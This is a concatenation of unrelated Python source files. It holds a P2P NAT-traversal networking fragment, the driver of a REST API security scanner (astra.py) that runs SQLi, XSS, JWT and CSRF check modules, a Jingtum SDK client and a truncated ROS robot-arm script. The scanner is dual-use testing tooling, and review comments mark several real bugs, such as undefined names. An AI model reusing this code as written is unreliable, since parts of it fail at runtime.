            if not node["con"].connected:
                self.debug_print("\a")
                self.debug_print("Removing disconnected: " + str(node))
                eval(node_list_name).remove(node)
    # Timeout connections that haven't responded to reverse query.
    old_reverse_queries = []
    for reverse_query in self.pending_reverse_queries:
        duration = time.time() - reverse_query["timestamp"]
        if duration >= self.reverse_query_expiry:
            reverse_query["con"].close()
            old_reverse_queries.append(reverse_query)
    # Remove old reverse queries.
    for reverse_query in old_reverse_queries:
        self.pending_reverse_queries.remove(reverse_query)
    # Get connection nonce (for building IDs.)
    if self.net_type == "direct":
        for node in self.inbound + self.outbound:
            if node["con"].nonce is not None:
                continue
            # Receive nonce part (non-blocking, accumulated across calls).
            if len(node["con"].nonce_buf) < 64:
                assert(node["con"].blocking != 1)
                remaining = 64 - len(node["con"].nonce_buf)
                nonce_part = node["con"].recv(remaining)
                if len(nonce_part):
                    node["con"].nonce_buf += nonce_part
            # Set nonce once the full 64 hex chars have arrived.
            if len(node["con"].nonce_buf) == 64:
                node["con"].nonce = node["con"].nonce_buf
    # Check for reverse connect requests.
    if self.dht_node is not None and self.net_type == "direct":
        # Don't do this every synch cycle.
        # NOTE(review): skip_dht_check is set when the last DHT message
        # is OLDER than dht_msg_interval, which looks inverted relative
        # to the stated intent -- confirm.
        t = time.time()
        skip_dht_check = 0
        if self.last_dht_msg is not None:
            if t - self.last_dht_msg > dht_msg_interval:
                skip_dht_check = 1
        if not skip_dht_check and len(self.dht_messages):
            processed = []
            for dht_response in self.dht_messages:
                # Found reverse connect request.
                msg = str(dht_response["message"])
                if re.match("^REVERSE_CONNECT:[a-zA-Z0-9+/-=_\s]+:[a-fA-F0-9]{64}$", msg) is not None:
                    # Process message.
                    self.debug_print(str(msg))
                    call, their_unl, nonce = msg.split(":")
                    their_unl = UNL(value=their_unl).deconstruct()
                    our_unl = UNL(value=self.unl.value).deconstruct()
                    node_id = their_unl["node_id"]
                    # Are we already connected.
                    is_connected = False
                    if nonce == "0" * 64:
                        # Use LAN IPs.
                        their_ip = their_unl["wan_ip"]
                        our_ip = our_unl["wan_ip"]
                        if their_ip == our_ip:
                            their_ip = their_unl["lan_ip"]
                            our_ip = our_unl["lan_ip"]
                        # Get con ID.
                        con_id = self.generate_con_id(
                            nonce,
                            their_ip,
                            our_ip
                        )
                        # Find con if it exists.
                        if self.con_by_id(con_id) is not None:
                            is_connected = True
                    else:
                        if self.con_by_unl(their_unl) is not None:
                            is_connected = True
                    # Skip if already connected.
                    if is_connected:
                        processed.append(dht_response)
                        continue
                    # Ask if the source sent it.
                    # success_builder closes over nonce / node_id /
                    # their_unl for when the new connection succeeds.
                    def success_builder():
                        def success(con):
                            # Indicate status.
                            self.debug_print("Received reverse connect"
                                             " notice")
                            self.debug_print(nonce)
                            # Did you send this?
                            query = "REVERSE_QUERY:" + self.unl.value
                            self.dht_node.repeat_relay_message(node_id,
                                                               query)
                            # Record pending query state.
                            query = {
                                "unl": their_unl["value"],
                                "con": con,
                                "timestamp": time.time()
                            }
                            self.pending_reverse_queries.append(query)
                        return success
                    self.debug_print("Attempting to do reverse connect")
                    self.unl.connect(their_unl["value"],
                                     {"success": success_builder()},
                                     nonce=nonce)
                    processed.append(dht_response)
                # Found reverse query (did you make this?)
                elif re.match("^REVERSE_QUERY:[a-zA-Z0-9+/-=_\s]+$", msg)\
                        is not None:
                    # Process message.
                    self.debug_print("Received reverse query")
                    call, their_unl = msg.split(":")
                    their_unl = UNL(value=their_unl).deconstruct()
                    node_id = their_unl["node_id"]
                    # Do we know about this?
                    if their_unl["value"] not in \
                            self.unl.pending_reverse_con:
                        self.debug_print(their_unl)
                        self.debug_print(str(self.unl.pending_reverse_con))
                        self.debug_print("oops, we don't know about this"
                                         " reverse query!")
                        processed.append(dht_response)
                        continue
                    else:
                        self.unl.pending_reverse_con.remove(
                            their_unl["value"])
                    # Send query.
                    query = "REVERSE_ORIGIN:" + self.unl.value
                    self.dht_node.repeat_relay_message(node_id, query)
                    processed.append(dht_response)
                # Found reverse origin (yes I made this.)
                elif re.match("^REVERSE_ORIGIN:[a-zA-Z0-9+/-=_\s]+$", msg) \
                        is not None:
                    self.debug_print("Received reverse origin")
                    for reverse_query in self.pending_reverse_queries:
                        pattern = "^REVERSE_ORIGIN:" + reverse_query["unl"]
                        pattern += "$"
                        if re.match(pattern, msg) is not None:
                            self.debug_print("Removing pending reverse"
                                             " query: success!")
                            self.pending_reverse_queries.remove(
                                reverse_query)
                    processed.append(dht_response)
            # Remove processed messages.
            for msg in processed:
                self.debug_print(msg)
                self.dht_messages.remove(msg)
        self.last_dht_msg = t
    # Accept inbound connections.
    if len(self.inbound) < self.max_inbound:
        # Accept new passive inbound connections.
        if self.passive is not None:
            r, w, e = select.select([self.passive], [], [], 0)
            for s in r:
                if s == self.passive:
                    # Accept a new con from the listen queue.
                    client, address = self.passive.accept()
                    con = Sock(blocking=0)
                    con.set_sock(client)
                    node_ip, node_port = con.s.getpeername()
                    # Reject duplicate connections.
                    if self.validate_node(node_ip, node_port):
                        try:
                            node = {
                                "type": "accept",
                                "con": con,
                                "ip": con.s.getpeername()[0],
                                "port": con.s.getpeername()[1],
                            }
                            self.inbound.append(node)
                            self.debug_print(
                                "Accepted new passive connection: " +
                                str(node))
                        except:
                            log.debug("con.s.get")
                    else:
                        self.debug_print("Validation failure")
                        con.close()
        # Accept new passive simultaneous connections.
        if self.node_type == "simultaneous":
            """
            This is basically the code that passive simultaneous
            nodes periodically call to parse any responses from the
            Rendezvous Server which should hopefully be new
            requests to initiate hole punching from active
            simultaneous nodes.
            If a challenge comes in, the passive simultaneous
            node accepts the challenge by giving details to the
            server for the challenging node (active simultaneous)
            to complete the simultaneous open.
            """
            # try:
            t = time.time()
            if self.rendezvous.server_con is not None:
                for reply in self.rendezvous.server_con:
                    # Reconnect.
                    if re.match("^RECONNECT$", reply) is not None:
                        if self.enable_advertise:
                            self.rendezvous.simultaneous_listen()
                        continue
                    # Find any challenges.
                    # CHALLENGE 192.168.0.1 50184 50185 50186 50187 TCP
                    parts = re.findall("^CHALLENGE ([0-9]+[.][0-9]+[.][0-9]+[.][0-9]+) ((?:[0-9]+\s?)+) (TCP|UDP)$", reply)
                    if not len(parts):
                        continue
                    (candidate_ip, candidate_predictions, candidate_proto)\
                        = parts[0]
                    self.debug_print("Found challenge")
                    self.debug_print(parts[0])
                    # Already connected.
                    if not self.validate_node(candidate_ip):
                        self.debug_print("validation failed")
                        continue
                    # Last meeting was too recent.
                    if t - self.last_passive_sim_open < sim_open_interval:
                        continue
                    # Accept challenge.
                    if self.sys_clock is not None:
                        origin_ntp = self.sys_clock.time()
                    else:
                        origin_ntp = get_ntp()
                    if origin_ntp is None:
                        continue
                    msg = "ACCEPT %s %s TCP %s" % (
                        candidate_ip,
                        self.rendezvous.predictions,
                        str(origin_ntp)
                    )
                    ret = self.rendezvous.server_con.send_line(msg)
                    if not ret:
                        continue
                    """
                    Adding threading here doesn't work because Python's
                    fake threads and the act of starting a thread ruins
                    the timing between code synchronisation - especially
                    code running on the same host or in a LAN. Will
                    compensate by reducing the NTP delay to have the
                    meetings occur faster and setting a limit for meetings
                    to occur within the same period.
                    """
                    # Walk to fight and return holes made.
                    self.last_passive_sim_open = t
                    con = self.rendezvous.attend_fight(
                        self.rendezvous.mappings, candidate_ip,
                        candidate_predictions, origin_ntp
                    )
                    if con is not None:
                        try:
                            node = {
                                "type": "simultaneous",
                                "con": con,
                                "ip": con.s.getpeername()[0],
                                "port": con.s.getpeername()[1],
                            }
                            self.inbound.append(node)
                        except:
                            # NOTE(review): 'e' here is not bound by this
                            # except clause and may be stale/undefined --
                            # confirm.
                            log.debug(str(e))
                            pass
                    # Create new predictions ready to accept next client.
                    self.rendezvous.simultaneous_cons = []
                    if self.enable_advertise:
                        self.rendezvous.simultaneous_listen()
    # QUIT - remove us from bootstrapping server.
    if len(self.inbound) == self.max_inbound:
        try:
            # Remove advertise.
            self.rendezvous.leave_fight()
        except:
            pass
    # Bootstrap again if needed.
    self.bootstrap()
    # Relist node again if noded.
    self.advertise()
"""
These functions here make the class behave like a list. The
list is a collection of connections (inbound) + (outbound.)
Every iteration also has the bonus of reaping dead connections,
making new ones (if needed), and accepting connections
"""
def __len__(self):
    """Number of live connections (inbound + outbound), after running a
    synchronize() housekeeping pass."""
    self.synchronize()
    return sum(len(group) for group in (self.inbound, self.outbound))
def __iter__(self):
    """Iterate over ready connection objects, running a synchronize()
    housekeeping pass first."""
    # Process connections.
    self.synchronize()
    # Collect the ready connections into one list.
    ready = []
    for node in self.inbound + self.outbound:
        con = node["con"]
        # On direct networks a con without a nonce is not ready yet.
        if con.nonce is None and self.net_type == "direct":
            continue
        ready.append(con)
    # Return all cons.
    return iter(ready)
if __name__ == "__main__":
    # NOTE: the entire body below is a single string literal -- these are
    # commented-out usage examples; nothing runs when executed directly.
    """
    net = Net(debug=1)
    net.disable_bootstrap()
    net.disable_advertise()
    net.disable_forwarding()
    net.start()
    print(net.unl.value)
    print(net.unl.deconstruct(net.unl.value))
    while 1:
        time.sleep(0.5)
    # Test simultaneous open.
    p2p_net = Net(debug=1, nat_type="preserving", node_type="simultaneous")
    p2p_net.start()
    p2p_net.disable_advertise()
    p2p_net.disable_bootstrap()
    # p2p_net.add_node("192.187.97.131", 0, "simultaneous") # Behind NAT
    def success_notify(con):
        print("SUCCESS THREADING.")
    #Test UNL
    events = {
        "success": success_notify
    }
    while 1:
        time.sleep(0.5)
    exit()
    #P2P network example.
    p2p_net = Net(debug=1)
    p2p_net.start()
    p2p_net.bootstrap()
    p2p_net.advertise()
    #Event loop.
    while 1:
        for con in p2p_net:
            for reply in con:
                print(reply)
        Excluses con from broadcast since we got this message from them
        p2p_net.broadcast("Something.", con)
        time.sleep(0.5)
    #Direct network example.
    dht_node = DHT()
    direct_net = Net(dht_node=dht_node, debug=1)
    direct_net.start()
    #Connect to some UNL.
    def success(con):
        con.send_line("Thanks.")
    #Note: this isn't a valid UNL.
    #To get your UNL do: direct_net.unl.value.
    direct_net.unl.connect("Some guys UNL...", {"success": success})
    """
|
astra.py | import argparse
import base64
import json
import requests
import time
import ast
import utils.logger as logger
import utils.logs as logs
import urlparse
from core.zapscan import *
from core.parsers import *
from utils.logger import *
from core.login import APILogin
from utils.logger import logger
from utils.config import update_value,get_value,get_allvalues
from modules.cors import cors_main
from modules.auth import auth_check
from modules.rate_limit import rate_limit
from modules.csrf import csrf_check
from modules.jwt_attack import jwt_check
from modules.sqli import sqli_check
from modules.xss import xss_check
from modules.redirect import open_redirect_check
from core.zap_config import zap_start
from multiprocessing import Process
from utils.db import Database_update
# Module-level DB handle used by update_scan_status() to persist scan state.
dbupdate = Database_update()
def parse_collection(collection_name,collection_type):
    """Parse the given API collection file into parse_data.api_lst.

    Exits the process when the collection type is unrecognised.
    """
    if collection_type == 'Postman':
        parse_data.postman_parser(collection_name)
    elif collection_type == 'Swagger':
        # NOTE(review): Swagger parsing is not implemented; the type is
        # only echoed back -- confirm intent.
        print collection_type
    else:
        print "[-]Failed to Parse collection"
        sys.exit(1)
def add_headers(headers):
    # This function deals with adding custom header and auth value .
    """Merge configured auth (cookie) and custom headers into *headers*.

    Mutates and returns the same dict.
    """
    get_auth = get_value('config.property','login','auth_type')
    if get_auth == 'cookie':
        # Cookie-based auth: merge the stored cookie into the headers.
        cookie = get_value('config.property','login','auth')
        cookie_dict = ast.literal_eval(cookie)
        cookie_header = {'Cookie': cookie_dict['cookie']}
        headers.update(cookie_header)
    try:
        # Best-effort merge of user-configured custom headers.
        custom_header = get_value('config.property','login','headers')
        custom_header = ast.literal_eval(custom_header)
        headers.update(custom_header)
    except:
        pass
    return headers
def generate_report():
    # Generating report once the scan is complete.
    # NOTE(review): 'api_scan' is only ever assigned as a local inside
    # modules_scan(); referencing it here raises NameError -- confirm.
    result = api_scan.generate_report()
    if result is True:
        print "%s[+]Report is generated successfully%s"% (api_logger.G, api_logger.W)
    else:
        print "%s[-]Failed to generate a report%s"% (api_logger.R, api_logger.W)
def read_scan_policy():
    """Read the attack policy dict from scan.property.

    Returns the parsed dict, or None on any failure (callers check for
    None). Bug fix: the original fell through to `return attack` after an
    exception, raising UnboundLocalError instead of signalling failure.
    """
    try:
        scan_policy = get_value('scan.property','scan-policy','attack')
        return ast.literal_eval(scan_policy)
    except Exception as e:
        print(e)
        print("Failed to parse scan property file.")
        return None
def update_scan_status(scanid, module_name=None, count=None):
    #Update scanning status and total scan of module into DB.
    """With count: record the total number of modules for this scan.
    Without count: mark *module_name* as completed ("Y")."""
    # NOTE(review): fixed delay looks like a workaround so the scan
    # record exists before updating -- confirm.
    time.sleep(3)
    if count is not None:
        dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {"total_scan" : count}})
    else:
        dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {module_name : "Y"}})
def modules_scan(url,method,headers,body,scanid=None):
    '''Scanning API using different engines '''
    # Which engines run is driven by the Y/N flags in scan.property.
    attack = read_scan_policy()
    if attack is None:
        print "Failed to start scan."
        sys.exit(1)
    if scanid is not None:
        # Count enabled modules so overall progress can be tracked in DB.
        count = 0
        for key,value in attack.items():
            if value == 'Y' or value =='y':
                count += 1
        print "Va",count,scanid
        update_scan_status(scanid,"",count)
    # OWASP ZAP active scan.
    if attack['zap'] == "Y" or attack['zap'] == "y":
        api_scan = zap_scan()
        status = zap_start()
        if status is True:
            api_scan.start_scan(url,method,headers,body,scanid)
    # Custom modules scan
    if attack['cors'] == 'Y' or attack['cors'] == 'y':
        cors_main(url,method,headers,body,scanid)
        update_scan_status(scanid, "cors")
    if attack['Broken auth'] == 'Y' or attack['Broken auth'] == 'y':
        auth_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "auth")
    if attack['Rate limit'] == 'Y' or attack['Rate limit'] == 'y':
        rate_limit(url,method,headers,body,scanid)
        update_scan_status(scanid, "Rate limit")
    if attack['csrf'] == 'Y' or attack['csrf'] == 'y':
        csrf_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "csrf")
    if attack['jwt'] == 'Y' or attack['jwt'] == 'y':
        jwt_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "jwt")
    if attack['sqli'] == 'Y' or attack['sqli'] == 'y':
        sqli_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "sqli")
    if attack['xss'] == 'Y' or attack['xss'] == 'y':
        xss_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "xss")
    if attack['open-redirection'] == 'Y' or attack['open-redirection'] == 'y':
        open_redirect_check(url,method,headers,body,scanid)
        update_scan_status(scanid, "open-redirection")
def validate_data(url,method):
    ''' Validate HTTP request data and return boolean value'''
    allowed_methods = ['GET','POST','DEL','OPTIONS','PUT']
    parsed = urlparse.urlparse(url)
    # Valid only when the method is recognised and the URL has a scheme.
    return method in allowed_methods and bool(parsed.scheme)
def scan_single_api(url, method, headers, body, api, scanid=None):
    ''' This function deals with scanning a single API. '''
    # Default the headers/method when the caller supplies none.
    if headers is None or headers == '':
        headers = {'Content-Type' : 'application/json'}
    if type(headers) is not dict:
        # Headers may arrive as a dict-literal string; parse safely.
        headers = ast.literal_eval(headers)
    if method == '':
        method = 'GET'
    result = validate_data(url, method)
    if result is False:
        print "[-]Invalid Arguments"
        return False
    # Run the engine scans in a separate process so API-mode callers can
    # return immediately.
    p = Process(target=modules_scan,args=(url,method,headers,body,scanid),name='module-scan')
    p.start()
    if api == "Y":
        return True
def scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require):
    ''' Scan every API in the parsed collection through the scan engines. '''
    if collection_type and collection_name is not None:
        parse_collection(collection_name,collection_type)
        if login_require is True:
            api_login.verify_login(parse_data.api_lst)
        for data in parse_data.api_lst:
            # Postman raw URLs may be nested under data['url']['raw'].
            try:
                url = data['url']['raw']
            except (TypeError, KeyError):
                url = data['url']
            headers,method,body = data['headers'],data['method'],''
            if headers:
                try:
                    # Bug fix: the result was previously assigned to a
                    # misspelled name ('headhers') and silently discarded.
                    headers = add_headers(headers)
                except Exception:
                    pass
            if data['body'] != '':
                body = json.loads(base64.b64decode(data['body']))
            # Bug fix: 'scanid' was referenced here but never defined
            # (NameError); CLI-driven scans carry no scan id.
            modules_scan(url,method,headers,body,None)
    else:
        print("%s [-]Invalid Collection. Please recheck collection Type/Name %s" %(api_logger.G, api_logger.W))
    #generate_report()
def get_arg(args=None):
    """Parse CLI arguments; exits with a usage hint when none are given.

    Returns a 9-tuple: (collection_type, collection_name, url, headers,
    method, body, loginurl, loginheaders, logindata).
    """
    parser = argparse.ArgumentParser(description='REST API Security testing Framework')
    parser.add_argument('-c', '--collection_type',
                        help='Type of API collection',
                        default='Postman',choices=('Postman', 'Swagger'))
    parser.add_argument('-n', '--collection_name',
                        help='Type of API collection')
    parser.add_argument('-u', '--url',
                        help='URL of target API')
    parser.add_argument('-headers', '--headers',
                        help='Custom headers.Example: {"token" : "123"}')
    parser.add_argument('-method', '--method',
                        help='HTTP request method',
                        default='GET',choices=('GET', 'POST'))
    parser.add_argument('-b', '--body',
                        help='Request body of API')
    parser.add_argument('-l', '--loginurl',
                        help='URL of login API')
    parser.add_argument('-H', '--loginheaders',
                        help='Headers should be in a dictionary format. Example: {"accesstoken" : "axzvbqdadf"}')
    parser.add_argument('-d', '--logindata',
                        help='login data of API')
    results = parser.parse_args(args)
    # All options are optional, so an empty argv parses fine -- reject it
    # explicitly with a usage hint.
    if len(args) == 0:
        print "%sAt least one argument is needed to procced.\nFor further information check help: %spython astra.py --help%s"% (api_logger.R, api_logger.G, api_logger.W)
        sys.exit(1)
    return (results.collection_type,
            results.collection_name,
            results.url,
            results.headers,
            results.method,
            results.body,
            results.loginurl,
            results.loginheaders,
            results.logindata,
            )
def main():
    """CLI entry point: derive the login/auth configuration from the
    supplied arguments, then start a collection scan or a single-API
    scan."""
    collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata = get_arg(sys.argv[1:])
    if loginheaders is None:
        loginheaders = {'Content-Type' : 'application/json'}
    # NOTE(review): 'loginmethod' is referenced in the branches below but
    # is never parsed by get_arg() nor assigned beforehand, so those
    # branches raise NameError when evaluated -- confirm and fix.
    if collection_type and collection_name and loginurl and loginmethod and logindata:
        # Login data is given as an input.
        api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
        login_require = False
    elif collection_type and collection_name and loginurl:
        # This will first find the given loginurl from collection and it will fetch auth token.
        parse_collection(collection_name,collection_type)
        try:
            # NOTE(review): assigns misspelled 'lognheaders'/'logidata';
            # the correctly spelled names are used below -- confirm.
            loginurl,lognheaders,loginmethod,logidata = api_login.parse_logindata(loginurl)
        except:
            print "[-]%s Failed to detect login API from collection %s " %(api_logger.R, api_logger.W)
            sys.exit(1)
        api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
        login_require = False
    elif loginurl and loginmethod:
        api_login.fetch_logintoken(loginurl,loginmethod,loginheaders,logindata)
        login_require = False
    elif collection_type and collection_name and headers:
        #Custom headers
        update_value('login','header',headers)
        login_require = False
    elif url and collection_name and headers:
        #Custom headers
        update_value('login','header',headers)
        login_require = False
    elif url:
        if headers is None:
            headers = {'Content-Type' : 'application/json'}
        if method is None:
            method = "GET"
        login_require = False
    else:
        login_require = True
    if body:
        # The request body arrives as a literal string; parse it safely.
        body = ast.literal_eval(body)
    # Configuring ZAP before starting a scan
    get_auth = get_value('config.property','login','auth_type')
    if collection_type and collection_name is not None:
        scan_core(collection_type,collection_name,url,headers,method,body,loginurl,loginheaders,logindata,login_require)
    else:
        scan_single_api(url, method, headers, body, "False")
if __name__ == '__main__':
    # Build the shared module-level helpers, print the banner, run the CLI.
    api_login = APILogin()
    parse_data = PostmanParser()
    api_logger = logger()
    api_logger.banner()
    main()
|
server.py | # -*- coding:utf-8 -*-
"""
* Copyright@2016 Jingtum Inc. or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
from websocket import create_connection
import threading
import json
import unirest
import urllib2
#import urllib.parse
import urlparse
#from urllib.error import HTTPError
from urllib2 import HTTPError
import json
import uuid
import urllib
import socket
from logger import logger
from config import Config
# Process-wide flag: when True, new Server instances use the test endpoints.
g_test_evn = False
class JingtumRESTException(Exception):
    """Raised when the Jingtum REST API returns an error response."""
    pass
class TumApiException(Exception):
    """Raised when the TumServer (ttong) API returns an error response."""
    pass
class Server(Config):
    """Base class holding endpoint configuration for the SDK servers.

    The production/test environment choice is remembered process-wide
    via the g_test_evn module global, so new instances inherit it.
    """
    def __init__(self):
        super(Server, self).__init__()
        global g_test_evn
        # Inherit the process-wide environment selection.
        self.setTest(g_test_evn)
    def setTest(self, isTest = False):
        """Switch this instance (and the process-wide default) between
        the test and production API endpoints."""
        global g_test_evn
        g_test_evn = isTest
        self.isTest = isTest
        if isTest:
            self.api_version = Config.test_api_version
            self.url = Config.test_api_address
            self.ws_address = Config.test_web_socket_address
            self.tt_address = Config.test_ttong_address
        else:
            self.api_version = Config.sdk_api_version
            self.url = Config.sdk_api_address
            self.ws_address = Config.sdk_web_socket_address
            self.tt_address = Config.ttong_address
    def setMode(self, is_Test):
        # Alias for setTest().
        self.setTest(is_Test)
class APIServer(Server):
    """HTTP client for the Jingtum REST API (sync via urllib2, async via
    unirest)."""
    def __init__(self):
        super(APIServer, self).__init__()
        pass
    def getasyn(self, path, parameters=None, method="GET", callback=None, cb_para=None):
        """Asynchronous GET; *callback* receives (response_body, cb_para)."""
        def get_cb(response):
            callback(response.body, cb_para)
        path = '/{version}/{path}'.format(version=self.api_version, path=path)
        url = "%s%s"%(self.url, path)
        if parameters:
            # Drop None values and render booleans as 'true'/'false'.
            parameters = {k:v for k,v in parameters.items() if v is not None}
            for k, v in parameters.items():
                if type(v) is bool:
                    parameters[k] = 'true' if v else 'false'
            parameters = urllib.urlencode(parameters)
            parameters = urllib.unquote(parameters)
        print ("in _request:" + str(url))
        print ("in _request:" + str(parameters))
        unirest.get(url, headers={"Content-Type": "application/json;charset=utf-8"},
                    params=parameters, callback=get_cb)
    def get(self, path, parameters=None, method="GET"):
        """Synchronous GET; returns the decoded JSON body.

        HTTP 400 responses are decoded and returned like successes; other
        HTTPErrors, and responses with success=false, raise
        JingtumRESTException.
        """
        path = '/{version}/{path}'.format(version=self.api_version, path=path)
        if parameters:
            # Drop None values and render booleans as 'true'/'false'.
            parameters = {k:v for k,v in parameters.items() if v is not None}
            for k, v in parameters.items():
                if type(v) is bool:
                    parameters[k] = 'true' if v else 'false'
            parameters = urllib.urlencode(parameters)
            parameters = urllib.unquote(parameters)
        # NOTE(review): 'pieces' is built but never used -- confirm.
        pieces = (self.url, path, parameters, None)
        url = "%s%s?%s"%(self.url, path, parameters)
        #logger.debug("in _request:" + str(url))
        print ("in _request:" + str(url))
        req = urllib2.Request(url)
        if method is not None:
            # Force the HTTP verb (urllib2 has no native method override).
            req.get_method = lambda:method
        try:
            response = urllib2.urlopen(req, timeout=10)
            # Grab the real socket so it can be closed explicitly.
            realsock = response.fp._sock.fp._sock
            res = json.loads(response.read().decode('utf-8'))
            realsock.close()
            response.close()
        except HTTPError as e:
            error_object = e.read()
            if e.code == 400:
                return json.loads(error_object.decode('utf-8'))
            else:
                raise JingtumRESTException(error_object)
        if res['success']:
            #del response['success']
            return res
        else:
            raise JingtumRESTException(res['message'])
    def postasyn(self, path, data=None, method="POST", callback=None):
        """Asynchronous POST (or DELETE) of JSON *data*; *callback*
        receives the response body."""
        def post_cb(response):
            callback(response.body)
        path = '/{version}/{path}'.format(version=self.api_version, path=path)
        url = "%s%s"%(self.url, path)
        data = json.dumps(data).encode('utf-8')
        print ("in _request:" + str(url))
        print ("in _request:" + str(data))
        if method == "DELETE":
            unirest.delete(url, headers={"Content-Type": "application/json;charset=utf-8"},
                           params=data, callback=post_cb)
        else:
            unirest.post(url, headers={"Content-Type": "application/json;charset=utf-8"},
                         params=data, callback=post_cb)
    def post(self, path, data=None, method="POST", callback=None):
        """Make an HTTP request to the server
        Encode the query parameters and the form data and make the GET or POST
        request
        :param path: The path of the HTTP resource
        :param parameters: The query parameters
        :param data: The data to be sent in JSON format
        :param secret: The secret key, which will be added to the data
        :param complete_path: Do not prepend the common path
        :returns: The response, stripped of the 'success' field
        :raises JingtumRESTException: An error returned by the rest server
        """
        path = '/{version}/{path}'.format(version=self.api_version, path=path)
        url = "%s%s"%(self.url, path)
        #logger.debug("in _request:" + str(url))
        print ("in _request:" + str(url))
        #req = urllib.request.Request(url)
        req = urllib2.Request(url)
        if method is not None:
            # Force the HTTP verb (also used by delete()).
            req.get_method = lambda:method
        if data is not None:
            req.add_header("Content-Type","application/json;charset=utf-8")
            data = json.dumps(data).encode('utf-8')
        try:
            #logger.debug("in _request:" + str(data))
            print ("in _request:" + str(data))
            response = urllib2.urlopen(req, data, timeout=10)
            # Grab the real socket so it can be closed explicitly.
            realsock = response.fp._sock.fp._sock
            res = json.loads(response.read().decode('utf-8'))
            realsock.close()
            response.close()
        except HTTPError as e:
            #error_object = json.loads(e.read().decode('utf-8'))['message']
            error_object = e.read()
            raise JingtumRESTException(error_object)
        #####print "in _request", path, response
        if res['success']:
            #del response['success']
            if callback is None:
                return res
            else:
                callback(res)
        else:
            raise JingtumRESTException(res['message'])
    def delete(self, path, data=None, method="DELETE"):
        """DELETE is implemented as post() with the method overridden."""
        return self.post(path, data, method)
class TumServer(Server):
    """Client for the TumApi endpoint using form-encoded requests."""
    def __init__(self):
        super(TumServer, self).__init__()
        pass
    def send(self, path, data=None, method="POST"):
        """Send form-encoded *data* to *path* and return the decoded JSON
        response.

        HTTP 400 responses are decoded and returned like successes; any
        other HTTPError raises TumApiException.
        """
        # if parameters:
        #     parameters = {k:v for k,v in parameters.items() if v is not None}
        #     for k, v in parameters.items():
        #         if type(v) is bool:
        #             parameters[k] = 'true' if v else 'false'
        #     parameters = urllib.urlencode(parameters)
        #     parameters = urllib.unquote(parameters)
        #     pieces = (self.url, path, parameters, None)
        #     url = urlparse.urlunsplit(pieces)
        # *path* is already a full URL here.
        url = path
        #logger.debug("in _request:" + str(url))
        print "in _request:" + str(url)
        req = urllib2.Request(url)
        if method is not None:
            # Force the HTTP verb.
            req.get_method = lambda:method
        if data is not None:
            req.add_data(urllib.urlencode(data))
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
        try:
            #logger.debug("in _request:" + str(data))
            print "in _request:" + str(data)
            response = urllib2.urlopen(req, timeout=10)
            # Grab the real socket so it can be closed explicitly.
            realsock = response.fp._sock.fp._sock
            res = json.loads(response.read().decode('utf-8'))
            realsock.close()
            response.close()
        except HTTPError as e:
            error_object = e.read()
            if e.code == 400:
                return json.loads(error_object.decode('utf-8'))
            else:
                #print "ddddddd", e.__dict__
                raise TumApiException(error_object)
        return res
class WebSocketServer(Server):
    """Wrapper over a blocking websocket connection: JSON-encoded
    subscribe/unsubscribe commands plus a daemon receive loop."""
    def __init__(self):
        super(WebSocketServer, self).__init__()
        # Set to True by close() to stop the receive loop.
        self._shutdown = False
        self.ws = create_connection(self.ws_address)
        #print self.ws.recv()#, self.ws.__dict__
    # def __del__(self):
    #     print "WebSocketClient __del__", self.close()
    def send(self, data):
        """JSON-encode *data* and send it over the websocket.

        Always returns None; responses arrive via receive().
        """
        ret = None
        data = json.dumps(data).encode('utf-8')
        try:
            self.ws.send(data)
            #ret = self.ws.recv()
            #ret = json.loads(ret.decode('utf-8'))
        except Exception, e:
            print "websocket send error", e
        return ret
    def subscribe(self, address, secret):
        """Subscribe to transaction events for *address*."""
        _data = {
            "command": "subscribe",
            "account": address,
            "secret": secret
        }
        ret = self.send(_data)
        return ret
    def unsubscribe(self, address):
        """Cancel the subscription for *address*."""
        _data = {
            "command": "unsubscribe",
            "account": address,
        }
        ret = self.send(_data)
        return ret
    def close(self):
        """Send the close command and stop the receive loop."""
        _data = {
            "command": "close",
        }
        self._shutdown = True
        return self.send(_data)
    def setTxHandler(self, callback, *arg):
        """Start a daemon thread that feeds incoming messages to
        *callback*."""
        t = threading.Thread(target=self.receive, args=(callback, arg))
        t.setDaemon(True)
        t.start()
    def receive(self, callback, *arg):
        """Blocking receive loop: decode each JSON message and pass it to
        *callback* until close() is called or recv fails."""
        try:
            while not self._shutdown:
                msg = json.loads(self.ws.recv().decode('utf-8'))
                #print 'websocket<<<<<<<< receiving % s', json.dumps(msg, indent=2)
                callback(msg, arg)
        except Exception, e:
            print e
|
Hiwin_RT605_ArmCommand_Socket_20190627204210.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' # initial value for transmitted data
Arm_feedback = 1 # assume the arm starts out busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
    """Mutable 6-DOF pose container: position (x, y, z) plus Euler
    orientation (pitch, roll, yaw)."""
    def __init__(self, x: float, y: float, z: float,
                 pitch: float, roll: float, yaw: float):
        self.x = x
        self.y = y
        self.z = z
        self.pitch = pitch
        self.roll = roll
        self.yaw = yaw
# Shared pose: written by point_data(), read when building arm commands.
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
